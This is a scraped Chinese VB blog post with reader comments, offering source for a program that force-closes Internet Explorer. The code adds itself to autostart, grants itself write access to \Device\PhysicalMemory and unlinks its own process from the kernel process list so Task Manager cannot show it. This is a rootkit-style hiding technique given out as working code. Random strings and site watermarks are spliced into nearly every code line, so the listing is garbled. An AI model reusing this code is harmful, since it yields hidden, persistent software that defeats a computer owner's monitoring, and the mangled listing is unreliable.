这是vb的世界,这是程序源代码的海洋,我借此与众多朋友共同交流编程思想,编程技巧,望我能够在帮助大家的同时,得到大家的恩惠。魔灵圣域欢迎大家的到来。

禁止IE运行

2008-11-01 11:01:15 / 个人分类:VB 类别


g Go8vI0禁止IE运行VBGood社区门户5E![a!Um8n
VBGood社区门户)x1N u%^:A/^

此程序可以禁止打开任何网页,并隐藏运行,在任务管理器中找不到任何痕迹,调用时用ctrl+shift+U调出应用程序VBGood社区门户#M8b2Ew;D
'**************************************************************************
,Xtcb0O:E0'**模 块 名:禁止IE运行 - Form1VBGood社区门户 b4h9i.Z[
'**说    明:郭卫制作
[/wjj C,G0'**创 建 人:icecept(魔灵)
%a2UyZ7Z+g0'**日    期:2006-10-30 00:52:46VBGood社区门户I A9xi Ixp
'**修 改 人:icecept(魔灵)
mDCy P0'**日    期:VBGood社区门户3Ry+a-ZZ~Uj
'**描    述:http://hi.baidu.com/icecept
AZ;v/z L\&MY2I0'**版    本:V1.0.0    http://icecept.blog.sohu.comVBGood社区门户c Xf w O4p
'*************************************************************************VBGood社区门户 ]*aG\%{LUG#WX
Option ExplicitVBGood社区门户}1tgDg)X
Private Sub Command1_Click()
]`A1jOJ,}p0    Timer1.Enabled = True
(E}4i K3ajJ1}0    Me.WindowState = vbMinimized
{3wI.r ^HqV%S0    Me.HideVBGood社区门户 mD|p"VS
End SubVBGood社区门户 F Y@-Nu hF8Dh,C
Private Sub Command2_Click()
qt7[S2r%F0    Timer1.Enabled = False
/K!T8R"P`7JE0    Me.WindowState = vbMinimizedVBGood社区门户eonq%t#j-J8d8}8\
    Me.Hide
Qd6u%Az2f0End Sub
aBw!w } e w0Private Sub Form_Load()
X c1KKt b"X$y/f7^F0    On Error Resume NextVBGood社区门户6l.k*I7]G&Y"i
      VBGood社区门户K z(o(A6n Qi C
    Dim HKey As Long, Message As Msg, Ret As Long
\&gN-G-Pv0    Dim name1 As String  '文件名所在的位置VBGood社区门户 F8F_~U r3lx-A
    Form1.Hide
cD Wf!}rF;V0    '判断注册表项是否存在VBGood社区门户,iFv0u~^r$p
    name1 = GetSetting(App.Title, "Settings", "Pass")
1h)C:y3P/V-P%pX0    If name1 = "" ThenVBGood社区门户 @5j p_8A
        '打开注册表项,设置自启动项目
6QM-WRQ0        Ret = RegSetValueEx(HKey, "禁止IE运行", 0, REG_SZ, ByVal CheckFilePath(App.Path) & "禁止IE运行.exe", LenB(CheckFilePath(App.Path) & "禁止IE运行.exe") + 1)VBGood社区门户A/?fu)aE C
        '关闭注册表项VBGood社区门户I'O&j \-Jf._3w
        RegCloseKey HKeyVBGood社区门户#]I A*s4_4z$y c
        name1 = "Pass"
t@~^{%K-z\0        SaveSetting App.Title, "Settings", "Pass", name1VBGood社区门户t,CR/Z.]u0i
    End If
&_1TEg`B0    If App.PrevInstance = True Then EndVBGood社区门户EH0L e*U OI3u4g
    App.TaskVisible = False   '隐藏程序VBGood社区门户%M J5l,~%n-G`^u
    HideCurrentProcess        '隐藏进程
,^/Z H z0L4~4Z e O0    '注册 Ctrl+Shift+U 为热键
"v+_3T AI(w0    RegisterHotKey Me.hWnd, &HBFFF&, MOD_CONTROL + MOD_SHIFT, vbKeyU
'A}7s8ur/o0    '等待处理消息VBGood社区门户D,n:bvI!O#O a)z[
    HotKey_Flg = False
;](Po/cN ^ne W0    Do While Not HotKey_FlgVBGood社区门户-x{$d-F\V
        '等待消息VBGood社区门户"q"W YW#W6S9c
        WaitMessageVBGood社区门户p#As8Cx6x
        '检查是否热键被按下
:@ Kkg2X_M0nS0        If PeekMessage(Message, Me.hWnd, WM_HOTKEY, WM_HOTKEY, PM_REMOVE) Then
'E1rG/| {uP7R0            '打开本程序
;F]U Pc0g0A6b0            Me.Show
k Fu5y5N5vbp8T)f6j0            Me.WindowState = vbNormal
{3Ba/l-t4h?4l0        End If
],{J x$L?(G0        '转让控制权,允许操作系统处理其他事件VBGood社区门户Y\nAnf^J7IYs:Q!D
        DoEvents
v ~;Mt@L0    LoopVBGood社区门户1k J-~#J*G*m;Rg8Op|
End SubVBGood社区门户)N0C@g q
Private Sub Timer1_Timer()
;vR` }OI)_0    On Error Resume NextVBGood社区门户-w9kFi\ B
    Dim winhwnd As Long
lsvz M#A0    '查找ie的句柄VBGood社区门户%} ~.X5zf.o\.U
    winhwnd = FindWindow("IEFrame", vbNullString)VBGood社区门户QHs*E`@u@E
    PostMessage winhwnd, WM_CLOSE, 0&, 0&VBGood社区门户i[M_3|N6c
End SubVBGood社区门户r[j]5u3t"jA
Private Sub Form_Unload(Cancel As Integer)
;|d~]U%j'O|0?0    On Error Resume Next
i:@'z4Eb;H,@0    HotKey_Flg = TrueVBGood社区门户Rl!K'n,vJV!A
    '撤销热键的注册
#I7\ e#V4}t9d U E5G%k0    Call UnregisterHotKey(Me.hWnd, &HBFFF&)VBGood社区门户:s B|(M"VJz2M
End Sub
dG-[/U@J2E3_i2n0
H@+m#VM Q0Private Function CheckFilePath(Path As String) As StringVBGood社区门户*`w ^X#HE
    '检查档位文件是否在根目录下
_(~ _%J;e]0    If Right(Path, 1) <> "\" ThenVBGood社区门户)e/J x H AU:H
        CheckFilePath = Path & "\"VBGood社区门户3~ uPTT0eM_n
    Else
y RV{6N b+M0        CheckFilePath = PathVBGood社区门户)q/}3a)g2[4^
    End If
`W5r,Xs @B)ky0End Function
+@n2Q^2z0在标准模块中的代码===========================================================
'A.lXH4y9Y*H1^0Option ExplicitVBGood社区门户c+U dP6?5mas R^:b
' FindWindow函数声明VBGood社区门户Uu,D+KN&BSK
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" _VBGood社区门户T[5[@)N,L~j~
                        (ByVal lpClassName As String, _VBGood社区门户1Kx;r+m j(vq7}
                        ByVal lpWindowName As String _
u5G6t)~R"v~0                        ) As LongVBGood社区门户J,y!o;|:`O9fm1f[c
' PostMessage函数声明
.\8HA8Uh0Public Declare Function PostMessage Lib "user32" Alias "PostMessageA" _VBGood社区门户:g OJ1WTj
                        (ByVal hWnd As Long, _
C*PTG:T0                        ByVal wMsg As Long, _
N5ND-~I0                        ByVal wParam As Long, _
1K_2|'[i!kB0                        lParam As Any _
,@R%dU o0                        ) As Long
?fQ6{7D/q0'关闭程序需要的常量
hzbYa)qOs0Public Const WM_CLOSE = &H10
`:tJk t`\j n5^bn5Fv0'操作注册表用到的api
o9e@ f @ @ T,F|0Public Declare Function RegCloseKey Lib "advapi32" (ByVal HKey As Long) As Long
ITl/N.ht:b9h!Z0Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal HKey As Long, ByVal lpSubKey As String, phkResult As Long) As LongVBGood社区门户N f k/\K!G,["W
Public Declare Function RegSetValueEx Lib "advapi32" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
4UD qEG&?0Public Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal HKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As LongVBGood社区门户vSssLz_7dC2C
Public Const HKEY_LOCAL_MACHINE = &H80000002
9LY;GfN!FM)Bap0Public Const REG_SZ = 1
#`[rV8Lvp0'以下是设置热键所用到的函数
Kc$NT/w+b/iB h0'  声明API函数
2_5z{;\ C-_ {0Public Declare Function RegisterHotKey Lib "user32" (ByVal hWnd As Long, ByVal id As Long, ByVal fsModifiers As Long, ByVal vk As Long) As Long
dt y.D;Wfu/_!tLzE0Public Declare Function UnregisterHotKey Lib "user32" (ByVal hWnd As Long, ByVal id As Long) As Long
WIb,R(BQ1?0Public Declare Function PeekMessage Lib "user32" Alias "PeekMessageA" (lpMsg As Msg, ByVal hWnd As Long, ByVal wMsgFilterMin As Long, ByVal wMsgFilterMax As Long, ByVal wRemoveMsg As Long) As Long
9H Wn7\Q u4T3MV0Public Declare Function WaitMessage Lib "user32" () As LongVBGood社区门户:RJ^Q&Ig2L-hw
'  声明结构VBGood社区门户I+d&d IU)V` B
Public Type POINTAPI
-fz6R(@9?"r1] w|_0    x As Long
6E2K'jG5Zw*~0    y As Long
N{8M-xP0End TypeVBGood社区门户Ra4BCw _}
Public Type Msg
5A.Sj,j7a MId1T:y0    hWnd As LongVBGood社区门户%@/i+sH$o'HB _"}
    Message As Long
KiA u.K/h\0    wParam As Long
/S Bp+H.N5te}0    lParam As Long
PU'X;B:_6i&\E lR.kW0    time As LongVBGood社区门户 q I ^i3?sg
    pt As POINTAPI
-S:X4nj{s0End Type
cJL3M,T3[T~-t0'  声明常数VBGood社区门户(RF2~}f~
Public Const MOD_ALT = &H1
@J*v#J\#l&bx0Public Const MOD_CONTROL = &H2
] on;{n0Public Const MOD_SHIFT = &H4VBGood社区门户*r]F'mjP
Public Const PM_REMOVE = &H1
O4LUZ2u*Uf"IdF'}&w0Public Const WM_HOTKEY = &H312
S0zx C-D E0Public HotKey_Flg As Boolean, Message As MsgVBGood社区门户hQWD0co Pv m
'----------------------------------------------------------------------------------------------VBGood社区门户 s}8K3{ xxwK
Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004VBGood社区门户;p4R#MR.Gx%OKt
Private Const STATUS_ACCESS_DENIED = &HC0000022
yu9k `3`*WDY0Private Const STATUS_INVALID_HANDLE = &HC0000008
4c'i0K?.Gv0Private Const ERROR_SUCCESS = 0&
X DK\$?P:X`0Private Const SECTION_MAP_WRITE = &H2VBGood社区门户)Qx7~NL7T l-DmE
Private Const SECTION_MAP_READ = &H4VBGood社区门户q-H9r!s5{bQt(`6s
Private Const READ_CONTROL = &H20000VBGood社区门户OJ H {ch)W
Private Const WRITE_DAC = &H40000
rNZ!B+F nJK7?0Private Const NO_INHERITANCE = 0
K/^ Zs}%?Bt_/V0Private Const DACL_SECURITY_INFORMATION = &H4VBGood社区门户#p,k*@f5j}9|Y
Private Type IO_STATUS_BLOCK
*s N |0O"v1Br~&X g0    Status As LongVBGood社区门户o&b-j^"etv
    Information As Long
BPSw%R W d0End Type
:C r!e&gVB0Private Type UNICODE_STRING
?f9^ ogcG0    Length As Integer
Y$c)|&@ btw)s0    MaximumLength As IntegerVBGood社区门户"a5r"Nd @'?
    Buffer As Long
v+xZA+y1y&J+b)w0End Type
b:D1T2su0Private Const OBJ_INHERIT = &H2
`.a"lg6pWDp0Private Const OBJ_PERMANENT = &H10
DO6h[])ct0Private Const OBJ_EXCLUSIVE = &H20
z_!q*b _0NY0Private Const OBJ_CASE_INSENSITIVE = &H40
zC-MVK#F)O(u4O@-|0Private Const OBJ_OPENIF = &H80VBGood社区门户RK4wrZ+_ smyb
Private Const OBJ_OPENLINK = &H100
fi|2m?+JG0Private Const OBJ_KERNEL_HANDLE = &H200
u,?2_"B0[ [%h0Private Const OBJ_VALID_ATTRIBUTES = &H3F2
Zx\'G2H fY0Private Type OBJECT_ATTRIBUTESVBGood社区门户8t,D\&i7y3N7m1Y&{
    Length As LongVBGood社区门户&BLb:mB]`.c
    RootDirectory As Long
!gN7LT7[)l0    ObjectName As LongVBGood社区门户oe6P Ilagx4]7r
    Attributes As Long
+e | p4l:V0    SecurityDeor As LongVBGood社区门户jr-m"j4i&V
    SecurityQualityOfService As LongVBGood社区门户D |1U3A_ u
End Type
f'UY|@c)ac Zc0Private Type ACLVBGood社区门户WB$q+rAs!W
    AclRevision As Byte
L}4^^9U3[U0    Sbz1 As ByteVBGood社区门户2TO5b.Oq?tFt&J
    AclSize As IntegerVBGood社区门户?*\_JD
    AceCount As IntegerVBGood社区门户l},T,Y `J7o!u1h
    Sbz2 As IntegerVBGood社区门户.n4V*uO-[7f ^
End Type
,Ge,J.So&d$W0Private Enum ACCESS_MODEVBGood社区门户QT ZL5F+b
    NOT_USED_ACCESSVBGood社区门户 h@3a `4G
    GRANT_ACCESS
i9F L'a2i,Ner`0    SET_ACCESS
2{[;LeLv+Ti8dM0    DENY_ACCESS
3o8@|Q7G3}2dK\,H0    REVOKE_ACCESSVBGood社区门户0TsY]T
    SET_AUDIT_SUCCESSVBGood社区门户eslR.d"ty Y
    SET_AUDIT_FAILURE
v'C:o!s5dZ}n-d0End Enum
.aa4` n.G ~3X2r m0Private Enum MULTIPLE_TRUSTEE_OPERATION
`N]s0G/xo a0    NO_MULTIPLE_TRUSTEE
:a7c~f]T0    TRUSTEE_IS_IMPERSONATE
)LCK3f;P+zD`0End EnumVBGood社区门户/lfM#e |,U3R.O
Private Enum TRUSTEE_FORMVBGood社区门户_ hg2@dO
    TRUSTEE_IS_SID
7@2LwcI E0    TRUSTEE_IS_NAMEVBGood社区门户]Fa M*G#aPQ E/I
End EnumVBGood社区门户/p nE6q+J1RM ~ Zl-k
Private Enum TRUSTEE_TYPEVBGood社区门户u0ypR*D/zk+w7x c
    TRUSTEE_IS_UNKNOWNVBGood社区门户?Z]ug)tIKo%^?6g
    TRUSTEE_IS_USERVBGood社区门户 T-OE8{|v\q-M
    TRUSTEE_IS_GROUPVBGood社区门户1B h]6jc$AXW9Gm
End EnumVBGood社区门户7\!W`,g!n2v"v#~'I
Private Type TRUSTEEVBGood社区门户/P"Dt}+j]M2KS] ?
    pMultipleTrustee            As Long
9ZhL,DD3hc:EV0Q0    MultipleTrusteeOperation    As MULTIPLE_TRUSTEE_OPERATIONVBGood社区门户p8mb8s.`m"qR
    TrusteeForm                 As TRUSTEE_FORMVBGood社区门户O h h'i-Y&ev
    TrusteeType                 As TRUSTEE_TYPE
9DB9dO7ibqm.W0    ptstrName                   As StringVBGood社区门户(]~8Q8l-M0W)d/UB
End Type
g)w2S&xq!ML B0Private Type EXPLICIT_ACCESS
Zo1upTa0    grfAccessPermissions        As LongVBGood社区门户z)H"o3n|I/^]
    grfAccessMode               As ACCESS_MODE
#X _n1cIs0    grfInheritance              As LongVBGood社区门户7q3r(U(Z B`
    TRUSTEE                     As TRUSTEEVBGood社区门户 D[(}^/X x^0K
End Type
;i7~bxW/?-O(p0Private Type AceArray
bF,UUH0    List() As EXPLICIT_ACCESS
yT8S"EKz1_0End Type
QiJ%T!kV \E0Private Enum SE_OBJECT_TYPEVBGood社区门户1M:?:lp az
    SE_UNKNOWN_OBJECT_TYPE = 0VBGood社区门户)O#c q/V*z
    SE_FILE_OBJECTVBGood社区门户~^$JiF i~p:se
    SE_SERVICEVBGood社区门户n)h(\,n7| oF7B2Hwb E
    SE_PRINTERVBGood社区门户S'oI] ?)sQh B^q
    SE_REGISTRY_KEY
n7y+BRd0    SE_LMSHARE
?m O.?(W0    SE_KERNEL_OBJECT
'k o1[a:Kz v7e\:L0    SE_WINDOW_OBJECTVBGood社区门户e,Q(a+c A,O'Za
    SE_DS_OBJECT
w{Ewz t I0    SE_DS_OBJECT_ALL
rn!`*d o H0    SE_PROVIDER_DEFINED_OBJECT
q*dN Y7gY0    SE_WMIGUID_OBJECTVBGood社区门户NJ@qdFL
End Enum
`X;p4jZ [!o L0Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
(ey7F,u(mMDH3P0Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long
?C.A H-INVv0Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As LongVBGood社区门户"Q)uL$vsg ^y}.b*x
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)
\` LqA'T3I0Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)VBGood社区门户$o*UL_$pcm V
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As LongVBGood社区门户0s0f+Cb[D
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As LongVBGood社区门户%i:y-?M7Rb1evH
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
(MR4@'[:P1alf{G0Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As LongVBGood社区门户L!rgz Z#s`
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As LongVBGood社区门户Jd Dz4\-M9|R
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)VBGood社区门户 I;Mv_u9? c/@/R"D
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As LongVBGood社区门户 pL+?bvB
Private Type OSVERSIONINFOVBGood社区门户0UcW}'f9Yj.~ \
    dwOSVersionInfoSize As LongVBGood社区门户K*]z.Y6_k
    dwMajorVersion As LongVBGood社区门户%YC.xy_r/j2q-Q7g
    dwMinorVersion As LongVBGood社区门户&e'Kpv `Yy;I
    dwBuildNumber As Long
.TC&D/o{s`Q]1{pj0    dwPlatformId As Long
!H$ZG4OP)h*F0    szCSDVersion As String * 128
I+|8Kavm2c`h%A0End Type
G,gZs.d%v'c t0Private verinfo As OSVERSIONINFOVBGood社区门户5YO&~&O3Y(S A kf
Private g_hNtDLL As Long
gG"D(n"lqG/E0Private g_pMapPhysicalMemory As Long
2k/L n.f iS0Private g_hMPM As Long
H _~0i:w!q;h,c8B0Private aByte(3) As Byte
;|z V^b0Public Sub HideCurrentProcess()
{b&{w.j0    '在进程列表中隐藏当前应用程序进程
@ u;H @)\u!s Bt-T;Q0    Dim thread As Long, process As Long, fw As Long, bw As LongVBGood社区门户p7d c-m&DJL:tm
    Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long
3G"{*Z AIfR s:M0    verinfo.dwOSVersionInfoSize = Len(verinfo)
UPU9w1brt0R[0    If (GetVersionEx(verinfo)) <> 0 Then
2`M5c,bQ yU0        If verinfo.dwPlatformId = 2 Then
$Bn }:h[|S0            If verinfo.dwMajorVersion = 5 ThenVBGood社区门户]9JS)nA1D#__9O
                Select Case verinfo.dwMinorVersionVBGood社区门户w5D@8kI;H
                    Case 0
#h"qkE3e'r0                    lOffsetFlink = &HA0
`,T y]e0                    lOffsetBlink = &HA4VBGood社区门户0rA4rde}S+x8eR%y
                    lOffsetPID = &H9CVBGood社区门户 `k\)wTCE3hA#D
                    Case 1
Z ] {_*Zi3w0y0                    lOffsetFlink = &H88
#CW[0BRIy)l:kJ0                    lOffsetBlink = &H8C
p!}7vmLd1e0                    lOffsetPID = &H84VBGood社区门户$La7mt*z6Dmk
                End Select
%_,D&Li7eu _'E]l~4a*o0            End If
'i:Ji:m'p2OCg0        End IfVBGood社区门户1c H9@ W/l] |h i
    End IfVBGood社区门户!m+TR1U/wO Zd
    If OpenPhysicalMemory <> 0 Then
;\C Bg*P;e!Ebr%o i0        thread = GetData(&HFFDFF124)
:H)yLp6@h*q\(ck0        process = GetData(thread + &H44)VBGood社区门户iVE9uo|K~d
        fw = GetData(process + lOffsetFlink)VBGood社区门户 h'RV4yR;P~
        bw = GetData(process + lOffsetBlink)
5v]p/L0Z+]2h0        SetData fw + 4, bw
hc.Dd%Zd0        SetData bw, fwVBGood社区门户iv [C.R/C"d,^O
        CloseHandle g_hMPMVBGood社区门户v%C4pn!qx
    End If
0W f&C)b6O Y0End Sub
5| IIT'x!F$@0Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
WdC)I'r-c4Jb0    Dim pDacl As Long
/_9i0T#i3Qj [@?8^0    Dim pNewDacl As Long
M;shAI9vq`4d!C0    Dim pSD As Long
^(C4Q Ar y9EjM;S0    Dim dwRes As Long
.f7h~X[H0    Dim ea As EXPLICIT_ACCESSVBGood社区门户di#V.G/@ v#Rrb
    GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD
5] F:_ eX0y{,I&B3P0    ea.grfAccessPermissions = SECTION_MAP_WRITE
9C4j3Nt#_0    ea.grfAccessMode = GRANT_ACCESSVBGood社区门户iL"@:n-^%e4u
    ea.grfInheritance = NO_INHERITANCEVBGood社区门户 Si P,oz+ut
    ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
YQ`jtE0    ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
5Q c.D*g*d jQY;E {0    ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullCharVBGood社区门户W C2~$ho*J J
    SetEntriesInAcl 1, ea, pDacl, pNewDaclVBGood社区门户'ye ]2i Hk#E9I
    SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0
i)?.W7L3v0CleanUp:VBGood社区门户(sPxATV
    LocalFree pSDVBGood社区门户$EL s(W{ qb
    LocalFree pNewDaclVBGood社区门户| W)AykUI+k
End Sub
z4v,pLe)z0Private Function OpenPhysicalMemory() As LongVBGood社区门户L!s0|9O?3Y.kw:{+}3H
    Dim Status As LongVBGood社区门户cn} A[&yK!Y
    Dim PhysmemString As UNICODE_STRINGVBGood社区门户vA'An8t(U!ghe
    Dim Attributes As OBJECT_ATTRIBUTES
c3t h{!cK3W0    RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
P_F2sFl0    Attributes.Length = Len(Attributes)
"H(n2Ufg2PRCt3K0c0    Attributes.RootDirectory = 0VBGood社区门户SMD-F.Ko_7O
    Attributes.ObjectName = VarPtr(PhysmemString)
a,d _:H(r0    Attributes.Attributes = 0VBGood社区门户;e,{$zh p
    Attributes.SecurityDeor = 0VBGood社区门户"n4jD| n
    Attributes.SecurityQualityOfService = 0VBGood社区门户3lk)Oe+L'rL0Na
    Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
@,~Ad5T-\v5^)|})X4|0    If Status = STATUS_ACCESS_DENIED ThenVBGood社区门户m1^*t'l#j xZ
        Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
4\4x CqhFN8t-Q0        SetPhyscialMemorySectionCanBeWrited g_hMPMVBGood社区门户]/yj.~}h
        CloseHandle g_hMPMVBGood社区门户hkYiW#wB JI
        Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)VBGood社区门户3gX)m/BV'aJ
    End If
Mx!WC2X0I[K%G+~0    Dim lDirectoty As LongVBGood社区门户\e _ r;X2oe7A
    verinfo.dwOSVersionInfoSize = Len(verinfo)VBGood社区门户+IIh|]
    If (GetVersionEx(verinfo)) <> 0 ThenVBGood社区门户$Tt-{q(HP? [1T
        If verinfo.dwPlatformId = 2 Then
(Z&r"zJ(o| jN0            If verinfo.dwMajorVersion = 5 Then
cw*Xk]f$x0                Select Case verinfo.dwMinorVersionVBGood社区门户8Q&ll0U'cp
                    Case 0VBGood社区门户d/{ n2|iHJ
                    lDirectoty = &H30000
dWx}pm$So0                    Case 1VBGood社区门户`3xBQ f
                    lDirectoty = &H39000
I/u*pDFAdt0                End Select
?wnZ D _1n]V&}m0            End If
oI2| v!u+d0        End If
-^-r%M7@_p N0    End If
9Xd'|g4i3e5ey r(\R0    If Status = 0 ThenVBGood社区门户(su2hQD#[
        g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)VBGood社区门户!lr b:E Yk!G;{
        If g_pMapPhysicalMemory <> 0 Then ōpenPhysicalMemory = g_hMPMVBGood社区门户N*bHjPF s+S&S
    End If
`K-M0^hpn&A}O IR0End Function
]5N!PyoOD0Private Function LinearToPhys(BaseAddress As Long, addr As Long) As LongVBGood社区门户/UF$U5N#~R;D-o
    Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
Jac%A&M-yn0    Dim lTemp As Long
t9?T%V6l_\.S0    VAddr = addr
g Nlc I&ZaI&}C[0    CopyMemory aByte(0), VAddr, 4VBGood社区门户T_`$pL.Yy
    lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))
K`,Q/`ta0    PGDE = BaseAddress + lTemp * 4
$h2Z/q0p Vj,}j0    CopyMemory PGDE, ByVal PGDE, 4VBGood社区门户X1g]3x*k R0H1h#Is
    If (PGDE And 1) <> 0 Then
+bl0w#iDT;S0        lTemp = PGDE And &H80VBGood社区门户?F5k]w)jN
        If lTemp <> 0 ThenVBGood社区门户e8i#ve@"Va,[
            PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
B)f$G%OU j!a0        ElseVBGood社区门户F v^~_R ?:I5r
            PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)
\0z+nJk5G0            lTemp = (VAddr And &H3FF000) / (2 ^ 12)VBGood社区门户,JG$PM"Cn+Z e
            PTE = PGDE + lTemp * 4
`mQ5hLByJ0            CopyMemory PTE, ByVal PTE, 4
(Q\^0o,wV,R0            If (PTE And 1) <> 0 ThenVBGood社区门户*gG#J}U b
                PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
S8P gf!x0                UnmapViewOfFile PGDEVBGood社区门户Q+Ji7LDS N%q
            End If
gK n ?jx+^V0        End If
oCoUX,v0    End If
,zx9f-zkj o0    LinearToPhys = PAddr
5]4@C![l0End FunctionVBGood社区门户-}^0}` s
Private Function GetData(addr As Long) As Long
3y }fL.o7l0    Dim phys As Long, tmp As Long, Ret As Long
6}#v5m;M,W TDRx0    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
|:|pXJ,c5u0    tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)
i1y%{6k.S-Q0qp+Z0    If tmp <> 0 ThenVBGood社区门户,h/e}o/W&da5r
        Ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4VBGood社区门户,s'BUa4C c
        CopyMemory Ret, ByVal Ret, 4
W9yc-gDlX6gT0        UnmapViewOfFile tmp
U*jD'S7G:r4w%C0        GetData = RetVBGood社区门户 ar)q;N%}Osy%p
    End If
&rZX {#J0End Function
eH\f*m1E0Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
\fs0a \s1gd0bZ0    Dim phys As Long, tmp As Long, x As Long
@]r{}E$}0    phys = LinearToPhys(g_pMapPhysicalMemory, addr)VBGood社区门户IRt v*O
    tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)
3Gr%p1|$Sv;P[0    If tmp <> 0 Then
@r!RW,dm-?0        x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4VBGood社区门户Ib v }F1c6@@F
        CopyMemory ByVal x, data, 4
8O)^A6[)HY0        UnmapViewOfFile tmpVBGood社区门户\vG zUd;n
        SetData = True
S*[3wNt;d8u/i0    End If
s]? BI@h,~"v0End FunctionVBGood社区门户0^_'B0E0W!yj
Private Function ByteArrToLong(inByte() As Byte) As DoubleVBGood社区门户#n5@#X[ ba
    Dim i As IntegerVBGood社区门户7x&Uy4c9W9i#W"PR
    For i = 0 To 3VBGood社区门户XGWAC$M7Wi
        ByteArrToLong = ByteArrToLong + inByte(i) * (&H100 ^ i)
v@6FJZ9R"wa)s0    Next iVBGood社区门户~!}(jA$o H} j
    '------------------------------------------------
^F_)?)I0    Exit FunctionVBGood社区门户 c0Lm'LU8OM
    '----------------VBGood社区门户'_$|5_ y&g9T~)U8R
ToExit:VBGood社区门户0hl&x:C1]
    Resume NextVBGood社区门户,n/[8]!b2WJ6g^b
End FunctionVBGood社区门户0m(x Fs/vl(t `

论坛模式 推荐 收藏 等级(0) 编辑 管理 查看(328) 评论(7)

TAG: VB API 注册表 IE 禁止运行

kx25发布于2008-12-28 21:03:33
将代码拷进VB后编译运行,在任务管理器看见进程,
v g1f6ouev
用ctrl+shift+U调出应用程序,按下Command1,IE打不开。L6Hqj;jY9r8Y
我一般不用IE,这代码用来屏蔽IE倒是可以考虑,可惜不能在任务管理器隐藏。q'F)h&yjCX
找过很多在XP里隐藏进程的VB代码,别人都说好,不知怎地在我的电脑上就是很难隐藏进程。曾经找到一个能隐藏进程的,可后来重新安装系统后就不能隐藏进程了。7cN JYE*c F
:b N:]
A4f
J
[ 本帖最后由 kx25 于 2008-12-28 21:21 编辑 ]
截图1.png

截图1.png

魔灵圣域之VB世界 icecept 发布于2008-12-28 13:31:28
回复 #6 guanzlk 的帖子
怎么回事啊?
!NPlN.v8B        Cp+c&r,uVBGood社区门户
s6W"Aw'NY.][ 本帖最后由 icecept 于 2008-12-28 16:58 编辑 ]
guanzlk发布于2008-12-28 11:10:13
更离奇的是附件:
9UI2[b/`"rh        oKUj
q@S~y;NKaspersky Lab9O9~F/G.Ru
拒绝访问
O A uPB'z无法返回请求的网页blog.vbgood.comWJO*g"C}s6K

H^t$Q*GO试图访问的网页:
1@b'[W d(yFVBGood社区门户!Sm
kAP?-V
http://www.vbgood.com/attachment.php?aid=blog.vbgood.com/C(w|3z\"D
21442
.i?#Mue#h/LV\blog.vbgood.com
